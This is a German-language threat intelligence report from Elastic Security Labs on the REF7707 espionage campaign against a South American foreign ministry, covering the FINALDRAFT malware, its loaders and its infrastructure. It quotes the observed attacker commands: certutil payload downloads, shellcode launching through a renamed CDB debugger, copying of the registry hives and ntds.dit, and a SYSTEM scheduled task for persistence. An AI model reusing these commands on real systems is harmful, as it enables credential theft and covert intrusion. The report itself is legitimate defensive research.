Von Südamerika bis Südostasien: Das fragile Netz der REF7707

REF7707 zusammengefasst

Elastic Security Labs hat eine Kampagne überwacht, die auf das Außenministerium eines südamerikanischen Landes abzielt, das Verbindungen zu anderen Kompromittierungen in Südostasien hat. Wir verfolgen diese Kampagne als REF7707.

Während die REF7707-Kampagne durch ein gut entwickeltes, hochleistungsfähiges, neuartiges Intrusion-Set gekennzeichnet ist, zeigten die Kampagnenbesitzer ein schlechtes Kampagnenmanagement und inkonsistente Umgehungspraktiken.

Das von REF7707 verwendete Intrusion-Set umfasst neuartige Malware-Familien, die wir als FINALDRAFT, GUIDLOADER und PATHLOADER bezeichnen. Wir haben eine detaillierte Analyse ihrer Funktionen und Fähigkeiten im Malware-Analysebericht von REF7707 - You've Got Malware: FINALDRAFT Hides in Your Drafts bereitgestellt.

Wichtigste Erkenntnisse

• REF7707 nutzte neuartige Malware gegen mehrere Ziele
• Die FINALDRAFT-Malware gibt es sowohl als Windows- als auch als Linux-Variante
• REF7707 eine ungewöhnliche LOLBin verwendet, um die Endpunktausführung zu erhalten
• Starke Nutzung von Cloud- und Drittanbieterdiensten für C2
• Die Angreifer nutzten eine schwache Betriebssicherheit, die zusätzliche Malware und Infrastruktur offenlegte, die in dieser Kampagne nicht verwendet wurden

Übersicht über die Kampagne

Ende November 2024 beobachteten die Elastic Security Labs eine dichte Häufung von Endpunkt-Verhaltenswarnungen, die im Außenministerium eines südamerikanischen Landes auftraten. Im weiteren Verlauf der Ermittlungen entdeckten wir eine ausgedehnte Kampagne und ein Intrusion-Set, das neuartige Malware, ausgeklügeltes Targeting und einen ausgereiften Betriebsrhythmus umfasste.

Während Teile der Kampagne ein hohes Maß an planerischer und technischer Kompetenz zeigten, wurden durch zahlreiche taktische Versäumnisse Vorproduktionsproben, Infrastruktur und zusätzliche Opfer von Malware offengelegt.

Kampagnenlayout (das Diamantmodell)

Elastic Security Labs verwendet das Diamond-Modell , um die Beziehungen auf hoher Ebene zwischen Angreifern, Fähigkeiten, Infrastruktur und Opfern von Eindringlingen zu beschreiben. Während das Diamond-Modell am häufigsten mit einzelnen Eindringlingen und der Nutzung von Activity Threading (Abschnitt 8) verwendet wird, um Beziehungen zwischen Vorfällen herzustellen, wird ein angreiferzentriertes (Abschnitt 7.1.4) Der Ansatz ermöglicht einen – wenn auch unübersichtlichen – einzelnen Diamanten.

Ablauf der Ausführung

Primäre Ausführungskette

REF7707 wurde ursprünglich durch die Elastic Security-Telemetrie des Außenministeriums eines südamerikanischen Landes identifiziert. Wir haben eine gängige LOLBin-Taktik beobachtet , bei der die certutil-Anwendung von Microsoft verwendet wird, um Dateien von einem Remote-Server herunterzuladen und lokal zu speichern.

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData\fontdrvhost.exe

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData\fontdrvhost.rar

certutil  -urlcache -split -f https://[redacted]/config.ini C:\ProgramData\config.ini

certutil  -urlcache -split -f https://[redacted]/wmsetup.log C:\ProgramData\wmsetup.log

Der Webserver, auf dem fontdrvhost.exe, fontdrvhost.rar, config.iniund wmsetup.log gehostet wurden, befand sich in derselben Organisation. Der elastische Agent wurde jedoch nicht ausgeführt. Dies war die erste beobachtete laterale Bewegung und gab Aufschluss über das Eindringen. Wir werden diese Dateien ausführlicher besprechen, aber im Moment handelt es sich fontdrvhost.exe um ein Debugging-Tool, config.ini um eine als Waffe eingesetzte INI-Datei, und fontdrvhost.rar konnte nicht wiederhergestellt werden.

WinrsHost.exe

Remote Shell-Plug-In der Windows-Remoteverwaltung (WinrsHost.exe) wurde verwendet, um die Dateien von einem unbekannten Quellsystem in einem verbundenen Netzwerk auf dieses System herunterzuladen. Das Plug-In ist der clientseitige Prozess, der von der Windows-Remoteverwaltung verwendet wird. Dies deutet darauf hin, dass die Angreifer bereits über gültige Netzwerkanmeldeinformationen verfügten und diese für laterale Bewegungen von einem zuvor kompromittierten Host in der Umgebung verwendeten. Wie diese Zugangsdaten erlangt wurden, ist nicht bekannt; Es ist möglich, dass die Anmeldeinformationen von dem Webserver abgerufen wurden, auf dem die verdächtigen Dateien gehostet werden.

Der Angreifer hat fontdrvhost.exe, fontdrvhost.rar, config.iniund wmsetup.log in das C:\ProgramData\ Verzeichnis heruntergeladen. Von dort aus wanderte der Angreifer zu mehreren anderen Windows-Endpunkten. Wir können zwar nicht alle offengelegten Anmeldeinformationen identifizieren, aber wir haben festgestellt, dass zum Herunterladen dieser Dateien ein lokales Administratorkonto verwendet wird.

Nach den Downloads vom Webserver zum Endpunkt sahen wir eine Reihe von Verhaltensregeln, die in schneller Folge ausgelöst wurden.

Auf sechs Windows-Systemen haben wir die Ausführung einer nicht identifizierten Binärdatei (08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1) als Kind von Services.exebeobachtet. Diese verdächtige Binärdatei verwendet einen pseudozufällig zugewiesenen Dateinamen, der aus sechs Kamelbuchstaben mit der Erweiterung .exe besteht und sich im Pfad C:\Windows\ befindet (Beispiel: C:\Windows\cCZtzzwy.exe). Wir konnten diese Datei nicht für die Analyse sammeln, aber wir schließen daraus, dass es sich um eine Variante von PATHLOADER handelt, basierend auf der Dateigröße (170,495 Bytes) und ihrem Speicherort. Diese Datei wurde mithilfe von SMB zwischen Systemen übergeben.

FontDrvHost.exe

Nachdem der Angreifer fontdrvhost.exe, fontdrvhost.rar, config.iniund wmsetup.loggesammelt hatte, führte er fontdrvhost.exe (cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9) aus, um mit dem Eindringen fortzufahren. fontdrvhost.exe handelt sich um eine umbenannte Version des von Windows signierten Debuggers CDB.exe. Der Missbrauch dieser Binärdatei ermöglichte es unseren Angreifern, bösartigen Shellcode, der in der config.ini Datei geliefert wurde, unter dem Deckmantel vertrauenswürdiger Binärdateien auszuführen.

CDB ist ein Debugger, der über 15 Jahre alt ist. Bei der Untersuchung, wie oft verdächtige Dateien an VirusTotal übermittelt wurden, sehen wir eine erhöhte Aktivität im 2021 und eine aggressive Beschleunigung ab Ende 2024.

CDB ist eine dokumentierte LOLBas-Datei, aber es gibt nicht viele veröffentlichte Forschungen darüber, wie sie missbraucht werden können. Der Sicherheitsforscher mrd0x hat eine großartige Analyse von CDB geschrieben, in der er beschreibt, wie es zum Ausführen von Shellcode, zum Starten von ausführbaren Dateien, zum Ausführen von DLLs, zum Ausführen von Shell-Befehlen und zum Beenden von Sicherheitslösungen verwendet werden kann (und sogar eine ältere Analyse von 2016 , die es als Shellcode-Runner verwenden). Dies ist zwar nicht neu, aber eine ungewöhnliche Angriffsmethode, die mit anderen Intrusion-Metadaten verwendet werden könnte, um Akteure über Kampagnen hinweg miteinander zu verbinden.

Obwohl config.ini nicht für die Analyse gesammelt wurde, enthielt es einen Mechanismus, durch den fontdrvhost.exe Shellcode lud; Die Art und Weise, wie es aufgerufen wurde, ähnelt FINALDRAFT.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe

• -cf - Gibt den Pfad und den Namen einer Skriptdatei an. Diese Skriptdatei wird ausgeführt, sobald der Debugger gestartet wird
• config.ini - Dies ist das Skript, das geladen werden soll
• -o - debuggt alle Prozesse, die von der Zielanwendung gestartet werden

Dann haben fontdrvhost.exe mspaint.exe erzeugt und Shellcode eingefügt.

Die Reverse Engineers der Elastic Security Labs analysierten diesen Shellcode, um die FINALDRAFT-Malware zu identifizieren und zu charakterisieren. Schließlich injizierten fontdrvhost.exe zusätzlichen Shellcode in den Speicher (6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3), der ebenfalls als FINALDRAFT-Malware identifiziert wurde.

Wie in der Analyse von FINALDRAFT beschrieben, verwendet die Malware standardmäßig mspaint.exe oder conhost.exe , wenn für einen Injektionsbefehl kein Zielparameter angegeben wird.

Konnektivitätsprüfungen

Der Angreifer führte mehrere Konnektivitätstests mit dem Befehl ping.exe und über PowerShell durch.

Das Invoke-WebRequest Cmdlet von PowerShell ähnelt wget oder curl, , das den Inhalt einer Webressource abruft. Dieses Cmdlet kann verwendet werden, um Tools über die Befehlszeile herunterzuladen, aber das war hier nicht der Fall. Bei diesen Anforderungen in Verbindung mit mehreren pings handelt es sich mit größerer Wahrscheinlichkeit um Konnektivitätsprüfungen.

graph.microsoft[.]com und login.microsoftonline[.]com sind rechtmäßige Microsoft-Websites, die API- und Web-GUI-Datenverkehr für den Outlook-Cloud-E-Mail-Dienst von Microsoft und andere Office 365 -Produkte bereitstellen.

• ping graph.microsoft[.]com
• ping www.google[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://google[.]com\
• Powershell Invoke-WebRequest -Uri \"hxxps://graph.microsoft[.]com\" -UseBasicParsing
• Powershell Invoke-WebRequest -Uri \"hxxps://login.microsoftonline[.]com\" -UseBasicParsing

digert.ictnsc[.]com und support.vmphere[.]com handelte es sich um Infrastrukturen im Besitz des Gegners.

• ping digert.ictnsc[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://support.vmphere[.]com\" -UseBasicParsing

Weitere Informationen zu diesen Netzwerkdomänen finden Sie im Abschnitt "Infrastruktur" weiter unten.

Aufklärung / Aufzählung / Credential Harvesting

Der Angreifer führte ein unbekanntes Skript namens SoftwareDistribution.txt mit dem Dienstprogramm diskshadow.exe aus, extrahierte die SAM-, SECURITY- und SYSTEM-Registrierungsstrukturen und kopierte die Active Directory-Datenbank (ntds.dit). Diese Materialien enthalten in erster Linie Anmeldeinformationen und Metadaten von Anmeldeinformationen. Der Angreifer verwendete das Dienstprogramm 7zip, um die Ergebnisse zu komprimieren:

diskshadow.exe /s C:\\ProgramData\\SoftwareDistribution.txt

cmd.exe /c copy z:\\Windows\\System32\\config\\SAM C:\\ProgramData\\[redacted].local\\SAM /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SECURITY C:\\ProgramData\\[redacted].local\\SECURITY /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SYSTEM C:\\ProgramData\\[redacted].local\\SYSTEM /y

cmd.exe /c copy z:\\windows\\ntds\\ntds.dit C:\\ProgramData\\[redacted].local\\ntds.dit /y

7za.exe a [redacted].local.7z \"C:\\ProgramData\\[redacted].local\\\"

Der Angreifer zählte auch Informationen über das System und die Domäne auf:

systeminfo

dnscmd . /EnumZones

net group /domain

C:\\Windows\\system32\\net1 group /domain

quser

reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID

reg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

Persistenz

Die Persistenz wurde mithilfe einer geplanten Aufgabe erreicht, die den umbenannten CDB.exe Debugger und die als Waffe aktivierte INI-Datei jede Minute als SYSTEMaufrief. Diese Methodik stellte sicher, dass sich FINALDRAFT im Speicher befand.

schtasks /create /RL HIGHEST /F /tn \"\\Microsoft\\Windows\\AppID\\EPolicyManager\" 
/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" 
/sc MINUTE /mo 1 /RU SYSTEM

• schtasks - das Programm "Geplante Aufgaben"
• /create - Erstellt eine neue geplante Aufgabe
• /RL HIGHEST - Gibt die Ausführungsebene des Auftrags an, HIGHEST als höchste Berechtigungsebene ausgeführt wird
• /F - Warnungen unterdrücken
• /tn \\Microsoft\\Windows\\AppID\\EPolicyManager\ - Aufgabenname, Versuch, eine authentisch aussehende geplante Aufgabe zu spiegeln
• /tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" - Auszuführende Aufgabe, in diesem Fall die fontdrvhost.exe Befehle, die wir zuvor behandelt haben
• /sc MINUTE - Zeitplantyp, MINUTE angibt, welcher in Minutenintervallen ausgeführt werden soll
• /mo 1 - Modifizierer, definiert 1 für das Zeitplanintervall
• /RU SYSTEM - definiert, unter welchem Konto ausgeführt werden soll; In diesem Fall wird die Aufgabe als Benutzer SYSTEM ausgeführt

FINALDRAFT Analyse

Eine technische Beschreibung, die die Fähigkeiten und die Architektur der FINALDRAFT- und PATHLOADER-Malware beschreibt, finden Sie hier. Auf hohem Niveau ist FINALDRAFT ein ausgereiftes, voll funktionsfähiges Remote-Administrationstool mit der Fähigkeit, Add-on-Module zu akzeptieren, die die Funktionalität erweitern und den Netzwerkverkehr intern auf verschiedene Weise leiten.

Obwohl FINALDRAFT mit verschiedenen Mitteln Befehl und Kontrolle herstellen kann, sind die bemerkenswertesten die Mittel, die wir in unserer Opferumgebung beobachtet haben, der Missbrauch der Graph-API von Microsoft. Wir haben diese Art von C2 von Drittanbietern erstmals in SIESTAGRAPH beobachtet, über den wir im Dezember 2022 berichtet haben.

Dieser Befehls- und Kontrolltyp ist eine Herausforderung für Verteidiger von Organisationen, die stark auf Netzwerktransparenz angewiesen sind, um sie zu erkennen. Sobald die erste Ausführung und das Einchecken abgeschlossen sind, läuft die gesamte weitere Kommunikation über eine legitime Microsoft-Infrastruktur (graph.microsoft[.]com) und fügt sich in die anderen organisatorischen Arbeitsstationen ein. Es unterstützt auch Relay-Funktionen, die es ermöglichen, Datenverkehr für andere infizierte Systeme zu leiten. Es umgeht Abwehrmechanismen, die sich auf netzwerkbasierte Intrusion Detection und Threat-Intelligence-Indikatoren verlassen.

PATHLOADER und GUIDLOADER

Sowohl PATHLOADER als auch GUIDLOADER werden verwendet, um verschlüsselte Shellcodes herunterzuladen und im Speicher auszuführen. Sie wurden in VirusTotal entdeckt, als die C2-Infrastruktur und die Zeichenfolgen, die in einer FINALDRAFT-Speichererfassung identifiziert wurden, untersucht wurden. Sie wurden nur in Verbindung mit FINALDRAFT-Nutzlasten beobachtet.

Ein Sample vom 2023 . Mai in VirusTotal ist die früheste identifizierte Binärdatei des REF7707 Intrusion Sets. Dieses Beispiel wurde zuerst von einem Webbenutzer aus Thailand eingereicht, dwn.exe (9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf) ist eine PATHLOADER-Variante, die eine verschlüsselte FINALDRAFT-Binärdatei von poster.checkponit[.]com und support.fortineat[.]com.

Zwischen Juni und August 2023 lud ein Hongkonger VirusTotal-Webnutzer 12 Samples von GUIDLOADER hoch. Diese Beispiele wiesen jeweils geringfügige Änderungen an der Art und Weise auf, wie die verschlüsselte Nutzlast heruntergeladen wurde, und wurden für die Verwendung von FINALDRAFT-Domänen konfiguriert:

• poster.checkponit[.]com
• support.fortineat[.]com
• Google Firebase (firebasestorage.googleapis[.]com)
• Pastebin (pastebin[.]com)
• Ein öffentlich zugängliches Web-Speichersystem der südostasiatischen Universität

Einige Beispiele von GUIDLOADER scheinen unfertig oder defekt zu sein, mit nicht funktionierenden Entschlüsselungsroutinen, während andere Debugzeichenfolgen enthalten, die in die Binärdatei eingebettet sind. Diese Variationen deuten darauf hin, dass die Proben Teil eines Entwicklungs- und Testprozesses waren.

FINALDRAFT bridging OS’

Ende 2024 wurden zwei Linux ELF FINALDRAFT-Varianten auf VirusTotal hochgeladen, eine aus den Vereinigten Staaten und eine aus Brasilien. Diese Beispiele weisen eine ähnliche C2-Vielseitigkeit und eine teilweise Neuimplementierung der Befehle auf, die in der Windows-Version verfügbar sind. URLs wurden aus diesen Dateien für support.vmphere[.]com, update.hobiter[.]comund pastebin.com.

Analyse der Infrastruktur

Im FINALDRAFT-Malware-Analysebericht wurden mehrere Domänen in den Samples identifiziert, die im REF7707 Eindringen in den gesammelt wurden, und andere Samples wurden durch Codeähnlichkeit identifiziert.

Service-Banner-Hashes

Eine Censys-Suche nach hobiter[.]com (der Domäne, die in der ELF-Variante von FINALDRAFT beobachtet wird, die im vorherigen Abschnitt besprochen wurde) gibt die IP-Adresse 47.83.8.198zurück. Dieser Server hat seinen Sitz in Hongkong und bedient die Ports 80 und 443. Die Zeichenfolge "hobiter[.]com" ist mit dem TLS-Zertifikat auf Port 443verknüpft. Ein Censys-Abfrage-Pivot auf dem Service-Banner-Hash dieses Ports ergibt sechs zusätzliche Server, die diesen Hash teilen (insgesamt sieben).

Zwei Server (203.232.112[.]186 und 13.125.236[.]162) haben nicht das gleiche Profil wie die anderen fünf. Der Service-Banner-Hash stimmt zwar noch überein, befindet sich aber nicht auf Port 443, sondern auf den Ports 15701, 15702, 15703und 15709. Darüber hinaus scheinen die betreffenden Ports die TLS-Kommunikation nicht zu unterstützen. Wir haben sie REF7707 nicht mit einem hohen Maß an Vertrauen zugeschrieben, sondern fügen sie der Vollständigkeit halber hinzu.

Die anderen fünf Server, einschließlich des ursprünglichen "Hobiter"-Servers, weisen mehrere Ähnlichkeiten auf:

• Service-Banner-Hash-Übereinstimmung am Port 443
• Geolokationen in Südostasien
• Windows OS
• Von Cloudflare ausgestellte TLS-Zertifikate
• Die meisten haben die gleiche ASN, die zu Alibaba gehört

Hobiter und VMphere

update.hobiter[.]com und support.vmphere[.]com wurden in einem ELF-Binärsystem (biosets.rar) gefunden vom 13. Dezember 2024. Beide Domains wurden über ein Jahr zuvor, am 12. September 2023, registriert. Diese ELF-Binärdatei bietet eine ähnliche C2-Vielseitigkeit und eine teilweise Neuimplementierung der Befehle, die in der Windows-Version von FINALDRAFT verfügbar sind.

Eine Nameserver-Suche von hobiter[.]com und vmphere[.]com ergibt nur einen Cloudflare-Nameserver-Datensatz für jeden und keine A-Einträge. Die Suche nach ihren bekannten Subdomains liefert uns A-Einträge, die auf Cloudflare-eigene IP-Adressen verweisen.

ICTNSC

ictnsc[.]com steht in direktem Zusammenhang mit dem oben genannten REF7707 Eindringen aus einer Konnektivitätsprüfung (ping digert.ictnsc[.]com), die von den Angreifern durchgeführt wurde. Der Server, der mit dieser Domain (8.213.217[.]182) verknüpft ist, wurde durch den Banner-Hash des Censys-Dienstes auf dem oben beschriebenen HTTPS-Dienst identifiziert. Wie die andere identifizierte Infrastruktur wird die Subdomain in Cloudflare-eigene IP-Adressen aufgelöst, und die übergeordnete Domain verfügt nur über einen Cloudflare NS-Eintrag. ictnsc[.]com wurde am 8. Februar 2023registriert.

Obwohl wir die Assoziation nicht als bösartig bestätigen können, sollte beachtet werden, dass es sich bei der Domain ict.nsc[.]ru um das Webeigentum des Federal Research Center for Information and Computational Technologies handelt, das oft als FRC oder ICT bezeichnet wird. Diese russische Organisation forscht in verschiedenen Bereichen wie Computermodellierung, Softwareentwicklung, Datenverarbeitung, künstliche Intelligenz und Hochleistungsrechnen.

Obwohl sie bei der REF7707 Invasion nicht beobachtet wurde, hat die von uns beobachtete Domäne (ictnsc[.]com) eine ict Subdomäne (ict.ictnsc[.]com), die der ict.nsc[.]ruauffallend ähnlich ist. Auch hier können wir nicht bestätigen, ob sie mit dem legitimen FRC oder ITC in Verbindung stehen, es scheint, dass der Bedrohungsakteur beabsichtigt hat, dass die Domains ähnlich, verschmolzen oder miteinander verwechselt werden.

Autodiscovar

Autodiscovar[.]com wurde nicht direkt mit FINALDRAFT-Malware in Verbindung gebracht. Es wurde indirekt mit REF7707 Infrastruktur in Verbindung gebracht, indem Pivots auf Web-Infrastruktur-Identifikatoren verwendet wurden. Die übergeordnete Domain verfügt nur über einen Cloudflare NS-Eintrag. Eine Subdomain, die über VirusTotal (cloud.autodiscovar[.]com) identifiziert wird, verweist auf IP-Adressen von Cloudflare. Dieser Domainname ähnelt anderen FINALDRAFT- und REF7707-Webinfrastrukturen und teilt sich den Banner-Hash des HTTPS-Dienstes. Diese Domain wurde am 26. August 2022registriert.

D-Links und VM-Clouds

d-links[.]net und vm-clouds[.]net wurden beide am 12. September 2023registriert, am selben Tag wie hobiter[.]com und vmphere[.]com. Die Server, auf denen diese Websites gehostet werden, verwenden ebenfalls denselben HTTPS-Dienstbanner-Hash. Sie stehen nicht in direktem Zusammenhang mit der FINALDRAFT-Malware und haben auch keine aktuellen routingfähigen Subdomains, obwohl pol.vm-clouds[.]net zuvor registriert wurde.

Fortineat

support.fortineat[.]com wurde in der PATHLOADER-Stichprobe (dwn.exe) hartcodiert. Bei unserer Analyse der Domain stellten wir fest, dass sie derzeit nicht registriert war. Um weitere Beispiele zu identifizieren, die mit der Domäne kommunizieren, hat unser Team diese Domäne registriert und einen Webserver konfiguriert, der auf eingehende Verbindungen wartet.

Wir haben Verbindungsversuche über Port 443aufgezeichnet, bei dem wir ein bestimmtes eingehendes Bytemuster identifiziert haben. Die Verbindungen stammten von acht verschiedenen Telekommunikations- und Internetinfrastrukturunternehmen in Südostasien, was auf mögliche Opfer des REF7707 Eindringens hindeutet.

Checkponit

poster.checkponit[.]com wurde zwischen Mai und Juli 2023 in vier GUIDLOADER-Samples und einem PATHLOADER-Sample beobachtet und zum Hosten des verschlüsselten FINALDRAFT-Shellcodes verwendet. Die checkponit[.]com Registrierung wurde am 26. August 2022erstellt. Es gibt derzeit keine A-Einträge für checkponit[.]com oder poster.checkponit[.]com.

Infrastruktur von Drittanbietern

Die graph.microsoft[.]com von Microsoft wird von den Varianten FINALDRAFT, PE und ELF für die Steuerung über die Graph-API verwendet. Dieser Dienst ist allgegenwärtig und wird für kritische Geschäftsprozesse von Unternehmen verwendet, die Office 365 verwenden. Verteidigern wird dringend empfohlen, diese Domain NICHT auf die Sperrliste zu setzen, es sei denn, die geschäftlichen Auswirkungen sind verstanden.

Der Firebase-Dienst von Google (firebasestorage.googleapis[.]com), Pastebin (pastebin[.]com) und eine südostasiatische Universität sind Dienste von Drittanbietern, die zum Hosten der verschlüsselten Nutzlast für die Loader (PATHLOADER und GUIDLOADER) verwendet werden, um die letzte Phase von FINALDRAFT herunterzuladen und zu entschlüsseln.

REF7707 Zeitleiste

Fazit

REF7707 wurde bei der Untersuchung eines Einbruchs in das Außenministerium eines südamerikanischen Landes entdeckt.

Die Untersuchung deckte neuartige Malware wie FINALDRAFT und ihre verschiedenen Loader auf. Diese Tools wurden mithilfe integrierter Betriebssystemfunktionen bereitgestellt und unterstützt, die für herkömmliche Anti-Malware-Tools schwer zu erkennen sind.

FINALDRAFT kooptiert den Graph-API-Dienst von Microsoft für Command and Control, um bösartige Indikatoren zu minimieren, die bei herkömmlichen netzwerkbasierten Intrusion Detection- und Prevention-Systemen beobachtbar wären. Hosting-Plattformen von Drittanbietern für verschlüsseltes Payload-Staging stellen diese Systeme ebenfalls früh in der Infektionskette vor Herausforderungen.

Ein Überblick über die VirusTotal-Einreicher und -Pivots anhand der Indikatoren in diesem Bericht zeigt eine relativ starke geografische Präsenz in Südostasien und Südamerika. SIESTAGRAPH war in ähnlicher Weise der erste Missbrauch der Graph-API in freier Wildbahn, den wir beobachtet hatten, und es handelte sich (REF2924) um einen Angriff auf das Außenministerium eines südostasiatischen Landes.

Bei Elastic Security Labs setzen wir uns für defensive Fähigkeiten in allen Bereichen der Informationssicherheit ein, die von sachkundigen Fachleuten betrieben werden, um komplexe Bedrohungen bestmöglich zu entschärfen.

REF7707 über MITRE ATT&CK

Elastic verwendet das MITRE ATT&CK-Framework , um gängige Taktiken, Techniken und Verfahren zu dokumentieren, die von Advanced Persistent Threats gegen Unternehmensnetzwerke eingesetzt werden.

• Erkundung
• Ausführung
• Persistenz
• Rechteausweitung
• Tarnung
• Zugriff mit Anmeldeinformationen
• Discovery
• Horizontale Bewegung
• Erfassung
• Command and Control
• Exfiltration

Erkennen von REF7707

YARA

• FINALDRAFT (Windows)
• FINALDRAFT (Linux)
• FINALENTWURF (Multi-OS)
• PFADLADER
• GUIDLOADER

Beobachtungen

Die folgenden Observablen wurden in dieser Studie diskutiert.

Referenzen

In der obigen Studie wurde auf Folgendes Bezug genommen:

• https://www.elastic.co/de/security-labs/finaldraft
• https://mrd0x.com/the-power-of-cdb-debugging-tool/
• https://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

Über Elastic Security Labs

Elastic Security Labs hat es sich zur Aufgabe gemacht, positive Veränderungen in der Bedrohungslandschaft herbeizuführen, indem es öffentlich zugängliche Forschungsergebnisse zu neuen Bedrohungen bereitstellt.

Folgen Sie Elastic Security Labs auf X @elasticseclabs und sehen Sie sich unsere Studie unter www.elastic.co/security-labs/ an. Sie können sich unter Elastic Security über die Technologie informieren, die wir für diese Studie genutzt haben.